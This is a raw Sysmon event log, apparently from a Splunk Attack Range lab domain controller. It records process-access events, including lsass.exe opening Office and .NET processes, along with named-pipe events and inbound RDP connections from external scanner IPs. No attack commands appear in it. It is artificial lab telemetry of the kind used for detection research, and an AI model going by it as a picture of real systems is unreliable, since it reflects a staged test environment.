Office\root\integration\integrator.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.842{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.811{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-E10D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.795{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-E10D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-E10D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.732{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8E2A1906A731C075CA414BAFEFA5114F,SHA256=9B9DD55AF82628CB5FF5889CAED5BAD12FD797867605A138895444046BB978AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.732{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3009ED0A52A36D4FC05946457BACC981,SHA256=0337C7BA0EC5936A721DD9D105F32E8F1FE607368339BB7539186A30C1CA45F2,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 17141700x800000000000000076662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.701{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764\ShellEx_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 17141700x800000000000000076661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.701{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764\FTA_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 17141700x800000000000000076660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.701{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648\ShellEx_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 10341000x800000000000000076659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.701{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000076658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.701{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 10341000x800000000000000076657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.701{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.701{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.701{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000076654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.686{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 17141700x800000000000000076653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:00.686{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe 10341000x800000000000000076652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.639{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-E00D-00000000BB01}6076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.623{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-E00D-00000000BB01}6076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-E00D-00000000BB01}6076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.545{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-DF0D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.545{A7A01FEF-EBF8-607E-DE0D-00000000BB01}13885444C:\Windows\system32\conhost.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.529{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DF0D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.529{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-DF0D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.514{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DE0D-00000000BB01}1388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.498{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092944C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108859|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7330e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7319a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4439a6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+44228d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000076642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.212{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58474-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.860{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53883-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.831{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57545-false10.0.1.12-8089- 10341000x800000000000000076639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.420{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-DB0D-00000000BB01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft 